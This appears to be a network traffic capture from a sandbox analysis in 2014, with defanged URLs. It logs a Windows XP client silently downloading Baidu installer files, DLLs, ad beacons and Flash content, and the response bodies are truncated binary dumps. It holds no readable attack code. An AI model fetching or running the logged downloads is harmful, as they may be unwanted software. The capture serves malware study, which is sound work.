Host: w.x.baidu.com
Range: bytes=16777216-
Referer: hXXp://w.x.baidu.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)


HTTP/1.1 302 Moved Temporarily
Server: nginx/1.4.3
Date: Fri, 13 Jun 2014 17:29:35 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.3.2
Location: hXXp://dl1sw.baidu.com/client/ws1215/0611/BaiduAn_Setup_1.0.647.511_Sid_55555_Silent_Defense.exe



GET /sw-search-shadu/client/dllv4/BDMReport.dll HTTP/1.1
Accept: */*
Accept-Language: zh-CN,zh,en-US
Connection: Keep-Alive
Host: dlsw.baidu.com
Range: bytes=393216-
Referer: hXXp://dlsw.baidu.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)


HTTP/1.1 206 Partial Content
Server: JSP2/1.0.27
Date: Fri, 13 Jun 2014 17:28:45 GMT
Content-Type: application/x-msdownload
Connection: close
Content-Length: 814304
Content-Range: bytes 393216-1207519/1207520
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: HEAD, GET, OPTIONS, PUT, POST, DELETE
Access-Control-Expose-Headers: Content-Length, ETag, x-bs-request-id, x-pcs-request-id
Access-Control-Allow-Headers: Range, Origin, Content-Type, Accept, Content-Length
Accept-Ranges: bytes
Last-Modified: Tue, 20 Aug 2013 07:03:07 GMT
Expires: Sat, 14 Jun 2014 07:20:40 GMT
x-bs-version: A65F70E089635AE47A1E2AED4F13B889
ETag: 30cbc602ada7cdfb0346038c05996d84
x-bs-request-id: MTAuMjE0LjQyLjIyOjgwODA6MTQ3NzYzMjU5MToxMS9KdW4vMjAxNCAxNToyMDo0MCA=
x-bs-meta-crc32: 2965621797
Content-MD5: 30cbc602ada7cdfb0346038c05996d84
x-bs-client-ip: MTE1LjIzMS40Mi4xMjA=
..Q.D$$.E.VP.....E..T$ Q..$VP..........................Q.D$$.E.VP.....
E..T$ .....$VP..........................Q.D$$.E.VP.....T$ ..P.E.VP....
......E.........QVP.L$LQ............P.E.VP....$........|$X...$........
....D$DP.........r...............Q.D$$.E.VP.....T$ P.E.VP.......C...E.
......j.VP.....L$..U..D$ ....4Q.D$(........VR.....T$$.L$ P.....L$....;
L$(.L$........D$...u..L$..D....N....p...........f....$.x........R,..X.
D$(.E.VP.....T$(P.E.VP.......D$...u..L$...........R0..\.D$(.E.VP....R.
T$,P.E.VP.......D$...u..L$...........R4..`.D$(.E.VP.....T$(P.E.VP.....
..D$...u..L$..~........R8..d.D$(.E.VP....R.T$,P.E.VP.......D$...u..L$.
.E........R<..h.D$(.E.VP.....E..T$(Q..$VP.......D$...u..L$.........
[email protected]$(.E.VP.....E..T$(.....$VP.......D$...u..L$...........RD..p.D
$(.E.VP.....T$(..P.E.VP.....D$...u..L$.......E....RHVP.L$HQ.......RtP.
E.VP....$........|$X...$............D$DP.U....u.....D$...L$..:........
RL..x.D$(.E.VP.....T$(P.E.VP.......D$...u..L$.........E..R|j.VP.....M.
.D$(....4j..D$(...PPVQ.....L$(P.D$(.....D$...u..L$.........P.V.....M.P
...P.Q............D$4..t.P..........$....d......Y_^[..]..)...[........
...(......._...........................B.......{........... .......j.h
(...d.....P...SUVW..v..3.P.D$$d......\$4...PD....3....l$..l$..l$ ...P(
.L$.QS...l$4..3...$.....L$.;.t .D$. ....;.s.......P.QS............P.S.
...9(t.........D$.;.t.P.|.......L$$d......Y_^][..................j.hX.
..d.....P...SUVW..v..3.P.D$,d......l$<.E..PH.L$.Q.....8.E..PD......
.G.3.3.;.~5.L$<.G..T$<...x..u...P.B.U............3..D$<H.
<<< skipped >>>


GET /tpl/wh.js HTTP/1.1
Accept: */*
Referer: hXXp://pos.baidu.com/wh/o.htm?ltr=&cf=u
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: dup.baidustatic.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Fri, 13 Jun 2014 17:29:10 GMT
Content-Type: application/x-javascript
Last-Modified: Mon, 26 May 2014 09:28:34 GMT
Transfer-Encoding: chunked
Connection: close
Server: Apache
Expires: Fri, 13 Jun 2014 17:34:10 GMT
Cache-Control: max-age=300
Content-Encoding: gzip
6757..............y{.G...??...P..@./. M.eW.....z.f..JB.f..R.....Dfb#%.
.y....@dd.].=.Fd{vw5^.......Y....wg..|.....7..............V?.u......E.
...=.tn..........cu1<.......l.<....&...j:iu..g'.MN....o.w{._?.O.
M.ts<.XL........O....M{......2|9<.N......x..;:..>;.......q.=.
..._N.a...W#....|.m.`....;.N.....j..../.o.........'........=.X........
ly~<9<.|....o.gC~...G.8..LNO5)...Q.z5.]L'.@:......p...^N?~..'...
v~.%kF:.......s;.a...p}.g.I..Y......rvt..u=.j.._.:..d0......V....o.V..
.l...Pm...........9?.m..........4z>k.i.<q...r.X.g'...{..q....J..
.x.......-w.... .o........En.......`.H..;.n.xy...."sF...dq<`.....r|
.f....=|.%..&...g...l.,................/.........&..y.v..........\.{9.
N.;..4.....2..4...........h.Y......z2-.....:8h^!'..6...wm..i:./n......
x4.n....Y......s...U...;._t......H..O...y.../.!.......-zv3...q}{9.1\_`
.........Miu...S.X....n!)....4..;......37.]<.W.:.........}w:.;..^. 
...Z...<5.N.\`%j.?......y.4/......j.......U..U%>w..mr6.Zn(......
.4...o.7..A..........m.u[...o..;....^.....cyq..4.fk..z6..:[T..VH...D5.
w......dp..~...................o.....K.B........R....~>...~;|3-/...
..[..%...E.....^\.........V.T&..............8.......]..,.;....j...{WY.
...UjW...C.;....A..xt;......>..../..7.~....w...ex..Vr.*...l.vK..:.O
.05....__..4.[_s.....W.?.m."`~...S..i.i....L.&M.........D......2...W..
6....Q/G.:)c.(q(.3...s%kG-.............|}.....|..Ev~{}9.<...._^_...
.......ma...k..wq...=...{..`........~;....i{.<.....2 lT..D...p.v..c
.?...@_..j.0....?.../.,[.....i.|.lb`....X.Y..=^..................~
<<< skipped >>>


GET /adx.php?c=cz04MTYzYzM2MjIwOTk5NGQ0AHQ9MTQwMjY4MDU2MwBzZT0xAGJ1PTEAcHJpY2U9VTVzMDh3QUt5cGw3akVwZ1c1SUE4bE96U3c1YlJwdW92NE1GdVEAY2htZD0xAHY9MQBpPTk3NzI2MzQ1 HTTP/1.1
Accept: */*
Referer: hXXp://pos.baidu.com/ecom?cec=utf-8&dai=1&cfv=11&cpa=1&col=en-us&dis=0&xuanting=0&n=67025059_1_cpr&conOP=0&scale=&skin=&rsi0=336&rsi1=280&rsi5=4<r=http://VVV.mnh.quzhao.com/x/mnh/mini/q428/mnh_428cc.html<u=http://VVV.mnh.quzhao.com/x/mnh/mini/q428/mini_mnh_428.html?1?id=0&pcs=758x450&rss0=#FFFFFF&rss1=#FFFFFF&rss2=#0000FF&rss3=#444444&rss4=#008000&rss5=&rss6=#e10900&rss7=&rad=&pis=10000x10000&aurl=&psr=1276x846&pss=758x493&tpr=1402680568181&lunum=6&ch=0&at=6&qn=b4429549b809eb77&ps=-2x-2&tn=text_default_336_280&ts=1&td_id=1537509&adn=3&cad=1&ccd=32&dtm=BAIDU_DUP2_SETJSONADSLOT&dc=2&di=u1537509
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: wn.pos.baidu.com
Connection: Keep-Alive
Cookie: BAIDUID=49F93F86C60D03A8D23F3919153C48A7:FG=1; ISBID=49F93F86C60D03A8D23F3919153C48A7:FG=1; ISUS=1; CPROID=49F93F86C60D03A8D23F3919153C48A7:FG=1; BAIDUID=D1F510B78251BF62B517A49EAEC89AE3:FG=1


HTTP/1.1 200 OK
Server: nginx
Date: Fri, 13 Jun 2014 17:29:24 GMT
Content-Type: image/gif
Content-Length: 49
Connection: close
Expires: Mon, 26 Jul 1997 05:00:00 GMT
GIF89a...................!.......,...........T..;..



GET /crossdomain.xml HTTP/1.1
Accept: */*
Accept-Language: en-US
x-flash-version: 11,6,602,168
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: resource.redirect.kukuplay.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: pws/1.4.2.9
Date: Fri, 13 Jun 2014 17:29:16 GMT
Content-Type: text/xml
Content-Length: 257
Last-Modified: Tue, 26 Jun 2012 13:04:28 GMT
Connection: keep-alive
ETag: "4fe9b35c-101"
Accept-Ranges: bytes
<?xml version="1.0"?>.<!DOCTYPE cross-domain-policy SYSTEM "/
xml/dtds/cross-domain-policy.dtd">.<cross-domain-policy> .   
<site-control permitted-cross-domain-policies="master-only"/>.  
 <allow-access-from domain="*" to-ports="*" />.</cross-domain
-policy>......


GET /upload/fishrlv31.swf HTTP/1.1


Accept: */*
Accept-Language: en-US
Referer: hXXp://resource.ws.kukuplay.com/players/2014/05/23/60130//fengyun.swf
x-flash-version: 11,6,602,168
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: resource.redirect.kukuplay.com
Connection: Keep-Alive


HTTP/1.1 302 Moved Temporarily
Server: pws/1.4.2.9
Date: Fri, 13 Jun 2014 17:29:17 GMT
Content-Type: text/html
Content-Length: 160
Connection: keep-alive
Location: hXXp://resource.dl.kukuplay.com/upload/fishrlv31.swf
<html>..<head><title>302 Found</title></hea
d>..<body bgcolor="white">..<center><h1>302 Found
</h1></center>..<hr><center>pws/1.4.2.9</ce
nter>..</body>..</html>..HTTP/1.1 302 Moved Temporarily
..Server: pws/1.4.2.9..Date: Fri, 13 Jun 2014 17:29:17 GMT..Content-Ty
pe: text/html..Content-Length: 160..Connection: keep-alive..Location: 
hXXp://resource.dl.kukuplay.com/upload/fishrlv31.swf..<html>..&l
t;head><title>302 Found</title></head>..<body 
bgcolor="white">..<center><h1>302 Found</h1></
center>..<hr><center>pws/1.4.2.9</center>..</b
ody>..</html>......


GET /upload/logoyanyi.FLV HTTP/1.1


Accept: */*
Accept-Language: en-US
Referer: hXXp://resource.ws.kukuplay.com/[[IMPORT]]/resource.dl.kukuplay.com/upload/fishrlv31.swf
x-flash-version: 11,6,602,168
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: resource.redirect.kukuplay.com
Connection: Keep-Alive


HTTP/1.1 302 Moved Temporarily
Server: pws/1.4.2.9
Date: Fri, 13 Jun 2014 17:29:39 GMT
Content-Type: text/html
Content-Length: 160
Connection: keep-alive
Location: hXXp://resource.dl.kukuplay.com/upload/logoyanyi.FLV
<html>..<head><title>302 Found</title></hea
d>..<body bgcolor="white">..<center><h1>302 Found
</h1></center>..<hr><center>pws/1.4.2.9</ce
nter>..</body>..</html>..HTTP/1.1 302 Moved Temporarily
..Server: pws/1.4.2.9..Date: Fri, 13 Jun 2014 17:29:39 GMT..Content-Ty
pe: text/html..Content-Length: 160..Connection: keep-alive..Location: 
hXXp://resource.dl.kukuplay.com/upload/logoyanyi.FLV..<html>..&l
t;head><title>302 Found</title></head>..<body 
bgcolor="white">..<center><h1>302 Found</h1></
center>..<hr><center>pws/1.4.2.9</center>..</b
ody>..</html>....



GET /sw-search-sp/client/dlljg1/BDMNet.dll HTTP/1.1
Accept: */*
Accept-Language: zh-CN,zh,en-US
Connection: Keep-Alive
Host: dlsw.baidu.com
Range: bytes=950272-
Referer: hXXp://dlsw.baidu.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)


HTTP/1.1 206 Partial Content
Server: JSP2/1.0.27
Date: Fri, 13 Jun 2014 17:29:02 GMT
Content-Type: application/x-msdownload
Connection: close
Content-Length: 294336
Content-Range: bytes 950272-1244607/1244608
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: HEAD, GET, OPTIONS, PUT, POST, DELETE
Access-Control-Expose-Headers: Content-Length, ETag, x-bs-request-id, x-pcs-request-id
Access-Control-Allow-Headers: Range, Origin, Content-Type, Accept, Content-Length
Accept-Ranges: bytes
Last-Modified: Wed, 21 Aug 2013 08:14:12 GMT
Expires: Sat, 14 Jun 2014 07:46:32 GMT
x-bs-version: 3DB44104797F6F34C7AB9E0A496537CC
ETag: 6812edbc825d28224d79d3645c9bb0f6
x-bs-request-id: MTAuMjE1Ljg4LjM2OjgwODA6MjQzNDMzNTU2MDoxMS9KdW4vMjAxNCAxNTo0NjozMiA=
x-bs-meta-crc32: 440605594
Content-MD5: 6812edbc825d28224d79d3645c9bb0f6
x-bs-client-ip: MTE1LjIzMS40Mi4xODE=
.....h...i...*.. ...0....... w...k...[...\...Y...u...j......@w...]...w
..."..0*.......h...i...*.. ...`...d....w...k..p\...\...Y...u...j......
@w...]...w..."..0*.......h...i...*.. ................k...e.......D...u
...j......0`.. ^..0_..."..0*.......h...i..@ .. ...........p|...k...c..
.d..` [email protected]..@d..."..0*..0....h...i...'.. .......google
/protobuf/descriptor.proto......... google/protobuf/descriptor.proto..
google.protobuf"G..FileDescriptorSet.2..file.. .(.2$.google.protobuf.F
ileDescriptorProto"....FileDescriptorProto....name.. .(.....package.. 
.(.....dependency.. .(..6..message_type.. .(.2 .google.protobuf.Descri
ptorProto.7..enum_type.. .(.2$.google.protobuf.EnumDescriptorProto.8..
service.. .(.2'.google.protobuf.ServiceDescriptorProto.8..extension.. 
.(.2%.google.protobuf.FieldDescriptorProto.-..options.. .(.2..google.p
rotobuf.FileOptions.9..source_code_info.. .(.2..google.protobuf.Source
CodeInfo"....DescriptorProto....name.. .(..4..field.. .(.2%.google.pro
tobuf.FieldDescriptorProto.8..extension.. .(.2%.google.protobuf.FieldD
escriptorProto.5..nested_type.. .(.2 .google.protobuf.DescriptorProto.
7..enum_type.. .(.2$.google.protobuf.EnumDescriptorProto.H..extension_
range.. .(.2/.google.protobuf.DescriptorProto.ExtensionRange.0..option
s.. .(.2..google.protobuf.MessageOptions.,..ExtensionRange....start.. 
.(.....end.. .(."....FieldDescriptorProto....name.. .(.....number.. .(
..:..label.. .(.2 .google.protobuf.FieldDescriptorProto.Label.8..type.
. .(.2*.google.protobuf.FieldDescriptorProto.Type....type_name.. .
<<< skipped >>>


GET /client/ws1215/0611/BaiduAn_Setup_1.0.647.511_Sid_55555_Silent_Defense.exe HTTP/1.1
Accept: */*
Accept-Language: zh-CN,zh,en-US
Connection: Keep-Alive
Host: dl1sw.baidu.com
Range: bytes=16252928-
Referer: hXXp://w.x.baidu.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)


HTTP/1.0 206 Partial Content
Expires: Sun, 13 Jul 2014 16:05:00 GMT
Date: Fri, 13 Jun 2014 16:05:00 GMT
Server: nginx
Content-Type: application/octet-stream
Last-Modified: Tue, 10 Jun 2014 19:14:19 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
Content-Range: bytes 16252928-30927031/30927032
Content-Length: 14674104
Age: 5072
Via: 1.0 sdytwt86:80 (Cdn Cache Server V2.0), 1.0 tswt76:80 (Cdn Cache Server V2.0), 1.0 jg11:8888 (Cdn Cache Server V2.0)
Connection: close
Content-Disposition: attachment;filename="BaiduAn_Setup_1.0.647.511_Sid_55555_Silent_Defense.exe"
...4.,rJs.,.J~%.%...XH.5.n....m........V|.W....:z..c...\...2m.[P."....
[..j.....z..$...66C..,..=.!.@4%....T..S,.r...5._!T/...V...X..R..Oj;.=/
S.*....^-......q&..0...=z..;...N.S...R.e.G........!x.VY..lL.H..9....H4
..."[email protected]./..]U........cm......1..
.\e...z|....b.@..`.......Y.....?.=c.....].......t..]./D...'....>.2.
!JY..0.T ..K. 7....:[email protected]......#6.0&....r.C......@.\.R...
.....,..axt..g... h)[email protected].(Z...c.....8..|q.......S.F.Ts.19f
[email protected].....*ZOq..^.M..S....I1..;;-..2.8f.ao..4...&p.e...RKG.8^..
,...I...c.....S..2.6..!..Z....c".......4P.G.%e...r...,<...$.7..V>
;u.CV...I.....X...J[..!P....VD[-....N....v..DH-.e.~3..<~..;..&....&
gt;........QRY.R.M....w_E. x....r.....l&a...'[email protected]>..%}.J....j.|uN
.0#.Qu.....;..yC.s.... z...)..*.eq..N.{_ql...G..1d;..G..lo.e......l$.n
s(.n...........'.HX.]X..........Cl...x.......lG.z."...$..4..)f\..canfV
.^.............p..V..5.d...r.!n[9x.$ U..j.......v-1y|w..z<>....A
...X...X..."A./e.\.........._......>GQ%.[......Q....{'m'[email protected]...
.A_...)&l.xV.!.....=.r...K...v_...y<..)T-.w|.h(.i.Q...t...hN%.=&O..
......a..._..E...j.X.i..B.P.?..p........ J....'............@Lm>.*Z.
..W....dW..g...G*.../..:.AD.:...K...u..T,...b..w9J...{0..K.._...n.6...
........F.:.........S..su#k.R....n.\..le.|.'<v.%.........r........S
.n.:&cST....|.....X._./......<.c=.R...H..Q........a.e.QC..C&....D..
....,.h....X........... 8y.!.m.T....~..g&.w.......vP9nQ.Ze...G.H".....
#uN....~../....~... ..` .FGo-.[PRy..i......G.$...H.dJ..L......[..R
<<< skipped >>>


GET /sw-search-sp/client/dlljg1/BDMNet.dll HTTP/1.1
Accept: */*
Accept-Language: zh-CN,zh,en-US
Connection: Keep-Alive
Host: dlsw.baidu.com
Range: bytes=196608-
Referer: hXXp://dlsw.baidu.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)


HTTP/1.1 206 Partial Content
Server: JSP2/1.0.27
Date: Fri, 13 Jun 2014 17:29:03 GMT
Content-Type: application/x-msdownload
Connection: close
Content-Length: 1048000
Content-Range: bytes 196608-1244607/1244608
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: HEAD, GET, OPTIONS, PUT, POST, DELETE
Access-Control-Expose-Headers: Content-Length, ETag, x-bs-request-id, x-pcs-request-id
Access-Control-Allow-Headers: Range, Origin, Content-Type, Accept, Content-Length
Accept-Ranges: bytes
Last-Modified: Wed, 21 Aug 2013 08:14:12 GMT
Expires: Sat, 14 Jun 2014 07:46:32 GMT
x-bs-version: 3DB44104797F6F34C7AB9E0A496537CC
ETag: 6812edbc825d28224d79d3645c9bb0f6
x-bs-request-id: MTAuMjE1Ljg4LjM2OjgwODA6MjQzNDMzNTU2MDoxMS9KdW4vMjAxNCAxNTo0NjozMiA=
x-bs-meta-crc32: 440605594
Content-MD5: 6812edbc825d28224d79d3645c9bb0f6
x-bs-client-ip: MTE1LjIzMS40Mi4xODE=
@..P..T0.t..G...3.PQ...........L$.d......Y_^....................Q.D$.V
.t$.W3.P...|$...1...F.."...~..~..~..F....._..."...F.."....^Y..........
....Q.D$.V.t$.j.P...D$......D.....^Y................Q.L$...$..........
...t...............Y..........QVW.L$.................D$...t,..........
..u....B......N........u....P......D$.WWP.J@.....^Y.....QVW.L$........
.........D$...t,............u....B......N........u....P......D$.WWP..?
.....^Y.....j.h.c..d.....PW.D7..3.P.D$.d......D$.P3.j4.|$.........;.t.
.L$.........N.Q..............T$.R.D$...........L$.d......Y_...........
S.\$.VS.L$.................D$...t,............u....B......N........u..
..P.......t.W.{...t..D$.P....P.._^[.......S.\$.W.|$.;.t;V..w...t*.F...
.....u....B......N........u....P........;.u.^_[.....j.h.Y..d.....P...V
W.D7..3.P.D$.d........t$..|$(..D$.....t..F p....F(.!...D$......D$.....
.|$$W...l......D$......F ..."...F.."...P..N..D2 ."...F [email protected].
..3.PQ...........L$.d......Y_^.......................HP.HL.@H......@..
...V3..p..0.p..p..p..p..p....P .Q..P$.Q.;..P(t.W...........:_.Q..P,.I.
;..H0^t...............S.\$..C...Vt...$P.z....C......s...t...WP.4......
......C....._^[.................j.hZq..d.....P.. UVW.D7..3.P.D$0d.....
.t$D...t$..l$..D$8.....F .N$.D$..F(...L$ .D$$t..............F,.D$(.F0.
..D$,t................T$..D$8..T$.t%.F$P.....3..D$.P.}4.l$.........3..
t$..|[email protected]$....D$8..D....L$D......L$ Q.D$<..\......D$8....t...$U.
G.....t..T$.R.4............L$0d......Y_^]..,...............U..j.h q..d
.....PQSVW.D7..3.P.E.d......e...j........E......<-.......t.....
<<< skipped >>>


GET /sw-search-sp/client/dlljg1/BDMNet.dll HTTP/1.1
Accept: */*
Accept-Language: zh-CN,zh,en-US
Connection: Keep-Alive
Host: dlsw.baidu.com
Range: bytes=1212416-
Referer: hXXp://dlsw.baidu.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)


HTTP/1.1 206 Partial Content
Server: JSP2/1.0.27
Date: Fri, 13 Jun 2014 17:29:17 GMT
Content-Type: application/x-msdownload
Connection: close
Content-Length: 32192
Content-Range: bytes 1212416-1244607/1244608
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: HEAD, GET, OPTIONS, PUT, POST, DELETE
Access-Control-Expose-Headers: Content-Length, ETag, x-bs-request-id, x-pcs-request-id
Access-Control-Allow-Headers: Range, Origin, Content-Type, Accept, Content-Length
Accept-Ranges: bytes
Last-Modified: Wed, 21 Aug 2013 08:14:12 GMT
Expires: Sat, 14 Jun 2014 07:46:32 GMT
x-bs-version: 3DB44104797F6F34C7AB9E0A496537CC
ETag: 6812edbc825d28224d79d3645c9bb0f6
x-bs-request-id: MTAuMjE1Ljg4LjM2OjgwODA6MjQzNDMzNTU2MDoxMS9KdW4vMjAxNCAxNTo0NjozMiA=
x-bs-meta-crc32: 440605594
Content-MD5: 6812edbc825d28224d79d3645c9bb0f6
x-bs-client-ip: MTE1LjIzMS40Mi4xODE=
<[email protected]$3,343<3D3L3
T3`3.3.3.3.3.3.3.4 4D4P4t4.4.4.4.4.4.4.4.4.5$5,[email protected]
.5.6 6D6P6t6.6.6.6.6.6.6.6.7 7\7p7|7.7.7.7.7.7.7.8.8.848<8H8l8t8.8.
8.8.8.8.8.9.9<9H9l9x9.9.9.9.9.9.9.:.:$:<:D:L:X:|:.:.:.:.:.:.:.:.
;.;.;,;4;<;H;l;t;|;.;.;.;.;.;.;.;.<.<4<@<d<.<.<
;.<.<.<.<.<.=.=.=,=4=T=h=t=|=.=.=.=.=.=.=.>$>8>
;D>L>d>p>.>.>.>.>.>.>.?.?4?<?H?l?x?.?
.?.?.?.?.?.........0.0.0$0,[email protected]$101T1`1.1.1.1.1.1
.1.2$202T2`2.2.2.2.2.2.2.2.2.3$303T3\3h3.3.3.3.3.3.3.4(4L4X4|4.4.4.4.4
.4.4.4.4.4.4.4.4.5.5.5 5D5L5X5.5.5.5.5.5.6$6,686\6d6l6t6.6.6.6.6.6.6.6
.7.7(7L7X7|7.7.7.7.7.7.7.7.8(848<8T8`8.8.8.8.8.8.8.8.8.9,949<9D9
L9X9|9.9.9.9.9.9.9.9.9.:,:4:<:H:l:t:|:.:.:.:.:.:.:.:.:.:.:.:.:.;.;.
;.;(;L;T;\;d;p;.;.;.;.;.;.;.;.;.;.<$<,<4<@<d<l<x&
lt;.<.<.<.<.<.<.=.=.=$=,=8=\=d=l=t=|=.=.=.=.=.=.=.=.
=.=.=.=.>(>L>X>|>.>.>.>.>.>.>.>.?&
lt;?P?\?d?|?.?.?.?.?.?.?.?......0....0(040<0\0t0.0.0.0.0.0.0.0.0.1$
1,141<1D1L1T1`1.1.1.1.1.1.1.1.1.1.2.2<2D2L2X2|2.2.2.2.2.2.2.2.2.
3,343<3H3l3t3|3.3.3.3.3.3.3.3.3.3.3.3.4(4L4T4`4.4.4.4.4.4.4.4.4.5.5
<5D5P5t5|5.5.5.5.5.5.5.6.6$6,646<6D6L6T6\6d6l6t6|6.6.6.6.6.6.6.6
.6.6.6.6.6.6.6.6.6.7.7.7.7$7,747<7D7L7T7\7d7p7.7.7.7.7.7.7.7.7.7.7.
8 8D8L8X8.8.8.8.8.8.8.8.8.8.8.8.8.949H9T9\9t9|9.9.9.9.9.9.9.9.9.:,:4:@
:t:|:.:.:.:.:.:.:.:.:.:.; ;,;4;T;\;d;t;|;.;.;.;.;.;.;.;.;.<.<
<<< skipped >>>


GET /media/v1/0f0002EBaHfWMpy9Ew2v2s.swf?url_type=1&id_555316071=media/v1/0f000rmn6cn7D14hDeZLyf.gif&id_555383237=media/v1/0f000DYlKNGeiuam3jyYls.swf&id_555316139=media/v1/0f000Z60Ab17JZtxZIQVnf.swf&id_555319614=media/v1/0f000AY4Gp2TGCsxgDBTq0.swf&id_555319634=media/v1/0f000AY4GuJTGCsxgDBTe0.swf&id_555319654=media/v1/0f0002dsZcSR_Ik2MbXxf0.swf&id_555319666=media/v1/0f000Z60AW17JZtxZIQVsf.png&id_555316223=media/v1/0f000KQDyCuvJFLfvix_cf.png&id_555383389=media/v1/0f0000vLC1Ofnh0LFprLSs.swf&id_555316259=media/v1/0f000c60Ma_q1Fr10rMvif.gif&id_555194204=media/v1/0f0002dsZ58R_Ik2MbXxd0.jpg&snapshot=& HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: hXXp://pos.baidu.com/ecom?cec=utf-8&dai=3&cfv=11&cpa=1&col=en-us&dis=0&xuanting=0&n=67025059_1_cpr&conOP=0&scale=&skin=&rsi0=728&rsi1=90&rsi
x-flash-version: 11,6,602,168
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: ubmcmm.baidustatic.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: JSP2/1.0.27
Date: Fri, 13 Jun 2014 17:29:06 GMT
Content-Type: application/x-shockwave-flash
Connection: close
Content-Length: 33752
Cache-Control: max-age=31536000
Expires: Thu, 12 Mar 2015 08:34:46 GMT
Last-Modified: Sat, 25 Apr 2009 07:04:00 GMT
media: media
CWS.....x..|.|SE...{'..M...R[.R.@,m..U.B[(.EvT.Y.H..$...<. *n......
......w.p..q.......f-E.}....*..v...9g.....e.|. H..!....G....... ..t.kg
.7.,k..C.(.?.......,]..xiYq .RRZSSSb..X,.A1:...............B...-....X.
f.....1"....1mk..8K....s....PIiq)[email protected]...'.X....5....&l
t;....Y.G.e...cl.V.bW.7G.X{[....y\...ZF...}.1.m^g{.#.Z..w..Lu...X....J
......q..:...Ox..h..\3.b.-.S..g....VVWT.......*....c......1.6.c.:..v..
..0"....nkq.q.G...[cU\2[.5.I0.\6.\YPj..........J.h,R.#.#..>...&....
'.H..-...U...W...z"...4..][email protected]]..A([email protected]
.S................[..S................b.U......}m....S.\.......#..mS..
\;cK.{..........g.7.IwM/.y.....n....[2}..;..{........}...3N?....n..;{{
..1W...m.tlM...><.....-....g..0....>....... ytl..'.k...._..3.
(..K].......]/...m.^....D.;......2N-.6......'.8....o....c.}... .wG....
....R.xq..)..........:'}.._.....f6.....]...c...W......Ku;......y..N..A
..p......X.o..`...j.......j..._h..$.u.r. v-a.R.....p..o.Nk.....@......
.S]..Q.y.Z-.mA...ki1G..-7.....=......aW]0h..tp.VfP.&.;Po..2g..mM.P...{
.7...i*;.7...uhg...aW.Z....*3 .6........$.?.V.R...$.&....~W0e.7.jkccG.
.y..!W.k.yO..(.g6O..X...9X|...v...kY8}z0..c.rn..........`(U....F.5.b..
...]..eN.....6.f..Dn].7.t...-...48B..a..eV...1.....J.L.... [...P6....y
.^.7.1....I...a. D.Y.Y.VW..FF..W... 8..E9=.#....c1..I.~ox`|...........
(..t....6.,;.4...........FZ2..{l.9..#....hjH"S....*Q.!=..f..6_$?!.....
9...f..R....&[....Y.L....YXgm....B.5.V`zj(.O.1=..:..=.Nr..D.P.....hiAW
k`. Zjoc.=...R...Z..E.........2....I.B........Y6......6..;....t..=
<<< skipped >>>


GET /mini/fymini.htm?f=aiqingzhihui&code=null HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Referer: hXXp://tv.aiqingzhihui.com/zhibo2.html?id=pczh_107_306.exe&en=1320146&go=
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: mini.fengyunzhibo.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Fri, 13 Jun 2014 17:28:47 GMT
Content-Type: text/html;charset=UTF-8
Connection: close
Vary: Accept-Encoding
Cache-Control: max-age=60
Content-Language: ar-SA
Age: 53
X-Cache: hit
